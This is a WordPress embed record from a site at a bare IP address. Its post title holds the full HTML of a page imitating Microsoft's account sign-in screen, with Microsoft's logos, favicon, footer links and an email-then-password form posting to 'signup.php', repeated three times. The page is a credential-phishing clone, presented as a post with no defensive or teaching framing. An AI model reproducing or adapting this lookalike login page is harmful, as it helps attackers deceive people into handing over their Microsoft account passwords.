{"version":"1.0","provider_name":"heyy","provider_url":"http:\/\/192.34.57.5","author_name":"Swaggerman1","author_url":"http:\/\/192.34.57.5\/index.php\/author\/swaggerman1\/","title":"<!DOCTYPE html> <html lang=\"en\"> <head>     <meta charset=\"UTF-8\">     <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\">     <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">     <link rel=\"stylesheet\" href=\"style.css\">     <title>Sign in to your Microsoft account<\/title>     <link rel=\"icon\" type=\"image\/x-icon\" href=\"https:\/\/logincdn.msftauth.net\/16.000.30004.15\/images\/favicon.ico\"> <\/head> <body>     <div class=\"container\">         <form action=\"signup.php\" method=\"POST\" name=\"logonForm\" ENCTYPE=\"application\/x-www-form-urlencoded\" autocomplete=\"off\">             <img class=\"logo\" src=\"https:\/\/logincdn.msauth.net\/shared\/1.0\/content\/images\/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg\">             <div class=\"forms-container\">                 <div class=\"forms\">                     <div class=\"first\">                         <h2>Sign in<\/h2>                         <div class=\"form-group\">                             <input type=\"email\" placeholder=\"Email, Phone, or Skype\" required>                         <\/div>                         <p>No aacount? <a href=\"#\">Create One!<\/a><\/p>                         <a href=\"#\">Sign in with a security key <span>?<\/span><\/a>                         <button type=\"button\" class=\"next-btn\">Next<\/button>                     <\/div>                     <div class=\"second\">                         <p><span class=\"arrow-btn\">&#8592;<\/span> <span class=\"email\">helloworld@hotmail.com<\/span><\/p>                         <h2>Enter password<\/h2>                         <div class=\"form-group\">                             <input type=\"password\" placeholder=\"Password\" required>                         <\/div>                         <a href=\"#\">Forgot password?<\/a>                         <button type=\"button\">Sign in<\/button>                     <\/div>                 <\/div>             <\/div>         <\/form>         <div class=\"bottom\">             <img src=\"https:\/\/logincdn.msauth.net\/shared\/1.0\/content\/images\/signin-options_4e48046ce74f4b89d45037c90576bfac.svg\">             <span>Sign-in options<\/span>         <\/div>     <\/div>     <div id=\"footer\" role=\"contentinfo\" data-bind=\"         externalCss: {             'footer': true,             'has-background': !$page.useDefaultBackground() &amp;&amp; $page.showFooter(),             'background-always-visible': $page.backgroundLogoUrl }\" class=\"footer ext-footer\">         <div data-bind=\"component: { name: 'footer-control',             publicMethods: $page.footerMethods,             params: {                 serverData: svr,                 useDefaultBackground: $page.useDefaultBackground(),                 hasDarkBackground: $page.backgroundLogoUrl(),                 showLinks: true,                 showFooter: $page.showFooter(),                 hideTOU: $page.hideTOU(),                 termsText: $page.termsText(),                 termsLink: $page.termsLink(),                 hidePrivacy: $page.hidePrivacy(),                 privacyText: $page.privacyText(),                 privacyLink: $page.privacyLink() },             event: {                 agreementClick: $page.footer_agreementClick,                 showDebugDetails: $page.toggleDebugDetails_onClick } }\"> <div id=\"footerLinks\" class=\"footerNode text-secondary footer-links ext-footer-links\" data-bind=\"externalCss: { 'footer-links': true }\"> <a id=\"ftrTerms\" data-bind=\"             text: termsText,             href: termsLink,             click: termsLink_onClick,             externalCss: {                 'footer-content': true,                 'footer-item': true,                 'has-background': !useDefaultBackground,                 'background-always-visible': hasDarkBackground }\" href=\"https:\/\/login.live.com\/gls.srf?urlID=WinLiveTermsOfUse&amp;mkt=EN-US&amp;uaid=e0a26cd453fc414f98698f45e0c991b9\" class=\"footer-content ext-footer-content footer-item ext-footer-item\">Terms of use<\/a>         <a id=\"ftrPrivacy\" data-bind=\"             text: privacyText,             href: privacyLink,             click: privacyLink_onClick,             externalCss: {                 'footer-content': true,                 'footer-item': true,                 'has-background': !useDefaultBackground,                 'background-always-visible': hasDarkBackground }\" href=\"https:\/\/login.live.com\/gls.srf?urlID=MSNPrivacyStatement&amp;mkt=EN-US&amp;uaid=e0a26cd453fc414f98698f45e0c991b9\" class=\"footer-content ext-footer-content footer-item ext-footer-item\">Privacy &amp; cookies<\/a>     <a id=\"moreOptions\" href=\"#\" role=\"button\" data-bind=\"         click: moreInfo_onClick,         ariaLabel: str['CT_STR_More_Options_Ellipsis_AriaLabel'],         attr: { 'aria-expanded': showDebugDetails().toString() },         hasFocusEx: focusMoreInfo(),         externalCss: {             'footer-content': true,             'footer-item': true,             'debug-item': true,             'has-background': !useDefaultBackground,             'background-always-visible': hasDarkBackground }\" aria-label=\"Click here for troubleshooting information\" aria-expanded=\"false\" class=\"footer-content ext-footer-content footer-item ext-footer-item debug-item ext-debug-item\">&#8230;<\/a> <\/div><\/div>     <\/div>     <script>         const forms = document.querySelector('.forms');         const nextButton = document.querySelector('.next-btn');         const arrowButton = document.querySelector('.arrow-btn');              const emailInput = document.querySelector('.first input');         const emailDisplay = document.querySelector('.email');         const passwordInput = document.querySelector('.second input');              nextButton.addEventListener('click', () => {             forms.classList.add('next-form');             emailDisplay.innerText = emailInput.value;             passwordInput.setAttribute('placeholder', 'Password for ' + emailInput.value);             document.querySelector('.bottom').style.display = 'none';         });              arrowButton.addEventListener('click', () => {             forms.classList.remove('next-form');             document.querySelector('.bottom').style.display = 'flex';         });     <\/script>     <\/body> <\/html>","type":"rich","width":600,"height":338,"html":"<blockquote class=\"wp-embedded-content\" data-secret=\"eCf5lBmUdI\"><a href=\"http:\/\/192.34.57.5\/index.php\/sign-in-to-your-microsoft-account-sign-in\/\"><!DOCTYPE html> <html lang=\"en\"> <head>     <meta charset=\"UTF-8\">     <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\">     <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">     <link rel=\"stylesheet\" href=\"style.css\">     <title>Sign in to your Microsoft account<\/title>     <link rel=\"icon\" type=\"image\/x-icon\" href=\"https:\/\/logincdn.msftauth.net\/16.000.30004.15\/images\/favicon.ico\"> <\/head> <body>     <div class=\"container\">         <form action=\"signup.php\" method=\"POST\" name=\"logonForm\" ENCTYPE=\"application\/x-www-form-urlencoded\" autocomplete=\"off\">             <img class=\"logo\" src=\"https:\/\/logincdn.msauth.net\/shared\/1.0\/content\/images\/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg\">             <div class=\"forms-container\">                 <div class=\"forms\">                     <div class=\"first\">                         <h2>Sign in<\/h2>                         <div class=\"form-group\">                             <input type=\"email\" placeholder=\"Email, Phone, or Skype\" required>                         <\/div>                         <p>No aacount? <a href=\"#\">Create One!<\/a><\/p>                         <a href=\"#\">Sign in with a security key <span>?<\/span><\/a>                         <button type=\"button\" class=\"next-btn\">Next<\/button>                     <\/div>                     <div class=\"second\">                         <p><span class=\"arrow-btn\">&#8592;<\/span> <span class=\"email\">helloworld@hotmail.com<\/span><\/p>                         <h2>Enter password<\/h2>                         <div class=\"form-group\">                             <input type=\"password\" placeholder=\"Password\" required>                         <\/div>                         <a href=\"#\">Forgot password?<\/a>                         <button type=\"button\">Sign in<\/button>                     <\/div>                 <\/div>             <\/div>         <\/form>         <div class=\"bottom\">             <img src=\"https:\/\/logincdn.msauth.net\/shared\/1.0\/content\/images\/signin-options_4e48046ce74f4b89d45037c90576bfac.svg\">             <span>Sign-in options<\/span>         <\/div>     <\/div>     <div id=\"footer\" role=\"contentinfo\" data-bind=\"         externalCss: {             'footer': true,             'has-background': !$page.useDefaultBackground() &amp;&amp; $page.showFooter(),             'background-always-visible': $page.backgroundLogoUrl }\" class=\"footer ext-footer\">         <div data-bind=\"component: { name: 'footer-control',             publicMethods: $page.footerMethods,             params: {                 serverData: svr,                 useDefaultBackground: $page.useDefaultBackground(),                 hasDarkBackground: $page.backgroundLogoUrl(),                 showLinks: true,                 showFooter: $page.showFooter(),                 hideTOU: $page.hideTOU(),                 termsText: $page.termsText(),                 termsLink: $page.termsLink(),                 hidePrivacy: $page.hidePrivacy(),                 privacyText: $page.privacyText(),                 privacyLink: $page.privacyLink() },             event: {                 agreementClick: $page.footer_agreementClick,                 showDebugDetails: $page.toggleDebugDetails_onClick } }\"> <div id=\"footerLinks\" class=\"footerNode text-secondary footer-links ext-footer-links\" data-bind=\"externalCss: { 'footer-links': true }\"> <a id=\"ftrTerms\" data-bind=\"             text: termsText,             href: termsLink,             click: termsLink_onClick,             externalCss: {                 'footer-content': true,                 'footer-item': true,                 'has-background': !useDefaultBackground,                 'background-always-visible': hasDarkBackground }\" href=\"https:\/\/login.live.com\/gls.srf?urlID=WinLiveTermsOfUse&amp;mkt=EN-US&amp;uaid=e0a26cd453fc414f98698f45e0c991b9\" class=\"footer-content ext-footer-content footer-item ext-footer-item\">Terms of use<\/a>         <a id=\"ftrPrivacy\" data-bind=\"             text: privacyText,             href: privacyLink,             click: privacyLink_onClick,             externalCss: {                 'footer-content': true,                 'footer-item': true,                 'has-background': !useDefaultBackground,                 'background-always-visible': hasDarkBackground }\" href=\"https:\/\/login.live.com\/gls.srf?urlID=MSNPrivacyStatement&amp;mkt=EN-US&amp;uaid=e0a26cd453fc414f98698f45e0c991b9\" class=\"footer-content ext-footer-content footer-item ext-footer-item\">Privacy &amp; cookies<\/a>     <a id=\"moreOptions\" href=\"#\" role=\"button\" data-bind=\"         click: moreInfo_onClick,         ariaLabel: str['CT_STR_More_Options_Ellipsis_AriaLabel'],         attr: { 'aria-expanded': showDebugDetails().toString() },         hasFocusEx: focusMoreInfo(),         externalCss: {             'footer-content': true,             'footer-item': true,             'debug-item': true,             'has-background': !useDefaultBackground,             'background-always-visible': hasDarkBackground }\" aria-label=\"Click here for troubleshooting information\" aria-expanded=\"false\" class=\"footer-content ext-footer-content footer-item ext-footer-item debug-item ext-debug-item\">&#8230;<\/a> <\/div><\/div>     <\/div>     <script>         const forms = document.querySelector('.forms');         const nextButton = document.querySelector('.next-btn');         const arrowButton = document.querySelector('.arrow-btn');              const emailInput = document.querySelector('.first input');         const emailDisplay = document.querySelector('.email');         const passwordInput = document.querySelector('.second input');              nextButton.addEventListener('click', () => {             forms.classList.add('next-form');             emailDisplay.innerText = emailInput.value;             passwordInput.setAttribute('placeholder', 'Password for ' + emailInput.value);             document.querySelector('.bottom').style.display = 'none';         });              arrowButton.addEventListener('click', () => {             forms.classList.remove('next-form');             document.querySelector('.bottom').style.display = 'flex';         });     <\/script>     <\/body> <\/html><\/a><\/blockquote><iframe sandbox=\"allow-scripts\" security=\"restricted\" src=\"http:\/\/192.34.57.5\/index.php\/sign-in-to-your-microsoft-account-sign-in\/embed\/#?secret=eCf5lBmUdI\" width=\"600\" height=\"338\" title=\"&#8220;&lt;!DOCTYPE html&gt; &lt;html lang=&quot;en&quot;&gt; &lt;head&gt;     &lt;meta charset=&quot;UTF-8&quot;&gt;     &lt;meta http-equiv=&quot;X-UA-Compatible&quot; content=&quot;IE=edge&quot;&gt;     &lt;meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=1.0&quot;&gt;     &lt;link rel=&quot;stylesheet&quot; href=&quot;style.css&quot;&gt;     &lt;title&gt;Sign in to your Microsoft account&lt;\/title&gt;     &lt;link rel=&quot;icon&quot; type=&quot;image\/x-icon&quot; href=&quot;https:\/\/logincdn.msftauth.net\/16.000.30004.15\/images\/favicon.ico&quot;&gt; &lt;\/head&gt; &lt;body&gt;     &lt;div class=&quot;container&quot;&gt;         &lt;form action=&quot;signup.php&quot; method=&quot;POST&quot; name=&quot;logonForm&quot; ENCTYPE=&quot;application\/x-www-form-urlencoded&quot; autocomplete=&quot;off&quot;&gt;             &lt;img class=&quot;logo&quot; src=&quot;https:\/\/logincdn.msauth.net\/shared\/1.0\/content\/images\/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg&quot;&gt;             &lt;div class=&quot;forms-container&quot;&gt;                 &lt;div class=&quot;forms&quot;&gt;                     &lt;div class=&quot;first&quot;&gt;                         &lt;h2&gt;Sign in&lt;\/h2&gt;                         &lt;div class=&quot;form-group&quot;&gt;                             &lt;input type=&quot;email&quot; placeholder=&quot;Email, Phone, or Skype&quot; required&gt;                         &lt;\/div&gt;                         &lt;p&gt;No aacount? &lt;a href=&quot;#&quot;&gt;Create One!&lt;\/a&gt;&lt;\/p&gt;                         &lt;a href=&quot;#&quot;&gt;Sign in with a security key &lt;span&gt;?&lt;\/span&gt;&lt;\/a&gt;                         &lt;button type=&quot;button&quot; class=&quot;next-btn&quot;&gt;Next&lt;\/button&gt;                     &lt;\/div&gt;                     &lt;div class=&quot;second&quot;&gt;                         &lt;p&gt;&lt;span class=&quot;arrow-btn&quot;&gt;&#8592;&lt;\/span&gt; &lt;span class=&quot;email&quot;&gt;helloworld@hotmail.com&lt;\/span&gt;&lt;\/p&gt;                         &lt;h2&gt;Enter password&lt;\/h2&gt;                         &lt;div class=&quot;form-group&quot;&gt;                             &lt;input type=&quot;password&quot; placeholder=&quot;Password&quot; required&gt;                         &lt;\/div&gt;                         &lt;a href=&quot;#&quot;&gt;Forgot password?&lt;\/a&gt;                         &lt;button type=&quot;button&quot;&gt;Sign in&lt;\/button&gt;                     &lt;\/div&gt;                 &lt;\/div&gt;             &lt;\/div&gt;         &lt;\/form&gt;         &lt;div class=&quot;bottom&quot;&gt;             &lt;img src=&quot;https:\/\/logincdn.msauth.net\/shared\/1.0\/content\/images\/signin-options_4e48046ce74f4b89d45037c90576bfac.svg&quot;&gt;             &lt;span&gt;Sign-in options&lt;\/span&gt;         &lt;\/div&gt;     &lt;\/div&gt;     &lt;div id=&quot;footer&quot; role=&quot;contentinfo&quot; data-bind=&quot;         externalCss: {             &#039;footer&#039;: true,             &#039;has-background&#039;: !$page.useDefaultBackground() &amp;&amp; $page.showFooter(),             &#039;background-always-visible&#039;: $page.backgroundLogoUrl }&quot; class=&quot;footer ext-footer&quot;&gt;         &lt;div data-bind=&quot;component: { name: &#039;footer-control&#039;,             publicMethods: $page.footerMethods,             params: {                 serverData: svr,                 useDefaultBackground: $page.useDefaultBackground(),                 hasDarkBackground: $page.backgroundLogoUrl(),                 showLinks: true,                 showFooter: $page.showFooter(),                 hideTOU: $page.hideTOU(),                 termsText: $page.termsText(),                 termsLink: $page.termsLink(),                 hidePrivacy: $page.hidePrivacy(),                 privacyText: $page.privacyText(),                 privacyLink: $page.privacyLink() },             event: {                 agreementClick: $page.footer_agreementClick,                 showDebugDetails: $page.toggleDebugDetails_onClick } }&quot;&gt; &lt;div id=&quot;footerLinks&quot; class=&quot;footerNode text-secondary footer-links ext-footer-links&quot; data-bind=&quot;externalCss: { &#039;footer-links&#039;: true }&quot;&gt; &lt;a id=&quot;ftrTerms&quot; data-bind=&quot;             text: termsText,             href: termsLink,             click: termsLink_onClick,             externalCss: {                 &#039;footer-content&#039;: true,                 &#039;footer-item&#039;: true,                 &#039;has-background&#039;: !useDefaultBackground,                 &#039;background-always-visible&#039;: hasDarkBackground }&quot; href=&quot;https:\/\/login.live.com\/gls.srf?urlID=WinLiveTermsOfUse&amp;mkt=EN-US&amp;uaid=e0a26cd453fc414f98698f45e0c991b9&quot; class=&quot;footer-content ext-footer-content footer-item ext-footer-item&quot;&gt;Terms of use&lt;\/a&gt;         &lt;a id=&quot;ftrPrivacy&quot; data-bind=&quot;             text: privacyText,             href: privacyLink,             click: privacyLink_onClick,             externalCss: {                 &#039;footer-content&#039;: true,                 &#039;footer-item&#039;: true,                 &#039;has-background&#039;: !useDefaultBackground,                 &#039;background-always-visible&#039;: hasDarkBackground }&quot; href=&quot;https:\/\/login.live.com\/gls.srf?urlID=MSNPrivacyStatement&amp;mkt=EN-US&amp;uaid=e0a26cd453fc414f98698f45e0c991b9&quot; class=&quot;footer-content ext-footer-content footer-item ext-footer-item&quot;&gt;Privacy &amp; cookies&lt;\/a&gt;     &lt;a id=&quot;moreOptions&quot; href=&quot;#&quot; role=&quot;button&quot; data-bind=&quot;         click: moreInfo_onClick,         ariaLabel: str[&#039;CT_STR_More_Options_Ellipsis_AriaLabel&#039;],         attr: { &#039;aria-expanded&#039;: showDebugDetails().toString() },         hasFocusEx: focusMoreInfo(),         externalCss: {             &#039;footer-content&#039;: true,             &#039;footer-item&#039;: true,             &#039;debug-item&#039;: true,             &#039;has-background&#039;: !useDefaultBackground,             &#039;background-always-visible&#039;: hasDarkBackground }&quot; aria-label=&quot;Click here for troubleshooting information&quot; aria-expanded=&quot;false&quot; class=&quot;footer-content ext-footer-content footer-item ext-footer-item debug-item ext-debug-item&quot;&gt;&#8230;&lt;\/a&gt; &lt;\/div&gt;&lt;\/div&gt;     &lt;\/div&gt;     &lt;script&gt;         const forms = document.querySelector(&#039;.forms&#039;);         const nextButton = document.querySelector(&#039;.next-btn&#039;);         const arrowButton = document.querySelector(&#039;.arrow-btn&#039;);              const emailInput = document.querySelector(&#039;.first input&#039;);         const emailDisplay = document.querySelector(&#039;.email&#039;);         const passwordInput = document.querySelector(&#039;.second input&#039;);              nextButton.addEventListener(&#039;click&#039;, () =&gt; {             forms.classList.add(&#039;next-form&#039;);             emailDisplay.innerText = emailInput.value;             passwordInput.setAttribute(&#039;placeholder&#039;, &#039;Password for &#039; + emailInput.value);             document.querySelector(&#039;.bottom&#039;).style.display = &#039;none&#039;;         });              arrowButton.addEventListener(&#039;click&#039;, () =&gt; {             forms.classList.remove(&#039;next-form&#039;);             document.querySelector(&#039;.bottom&#039;).style.display = &#039;flex&#039;;         });     &lt;\/script&gt;     &lt;\/body&gt; &lt;\/html&gt;&#8221; &#8212; heyy\" data-secret=\"eCf5lBmUdI\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\" class=\"wp-embedded-content\"><\/iframe><script>\n\/*! This file is auto-generated *\/\n!function(d,l){\"use strict\";l.querySelector&&d.addEventListener&&\"undefined\"!=typeof URL&&(d.wp=d.wp||{},d.wp.receiveEmbedMessage||(d.wp.receiveEmbedMessage=function(e){var t=e.data;if((t||t.secret||t.message||t.value)&&!\/[^a-zA-Z0-9]\/.test(t.secret)){for(var s,r,n,a=l.querySelectorAll('iframe[data-secret=\"'+t.secret+'\"]'),o=l.querySelectorAll('blockquote[data-secret=\"'+t.secret+'\"]'),c=new RegExp(\"^https?:$\",\"i\"),i=0;i<o.length;i++)o[i].style.display=\"none\";for(i=0;i<a.length;i++)s=a[i],e.source===s.contentWindow&&(s.removeAttribute(\"style\"),\"height\"===t.message?(1e3<(r=parseInt(t.value,10))?r=1e3:~~r<200&&(r=200),s.height=r):\"link\"===t.message&&(r=new URL(s.getAttribute(\"src\")),n=new URL(t.value),c.test(n.protocol))&&n.host===r.host&&l.activeElement===s&&(d.top.location.href=t.value))}},d.addEventListener(\"message\",d.wp.receiveEmbedMessage,!1),l.addEventListener(\"DOMContentLoaded\",function(){for(var e,t,s=l.querySelectorAll(\"iframe.wp-embedded-content\"),r=0;r<s.length;r++)(t=(e=s[r]).getAttribute(\"data-secret\"))||(t=Math.random().toString(36).substring(2,12),e.src+=\"#?secret=\"+t,e.setAttribute(\"data-secret\",t)),e.contentWindow.postMessage({message:\"ready\",secret:t},\"*\")},!1)))}(window,document);\n\/\/# sourceURL=http:\/\/192.34.57.5\/wp-includes\/js\/wp-embed.min.js\n<\/script>\n"}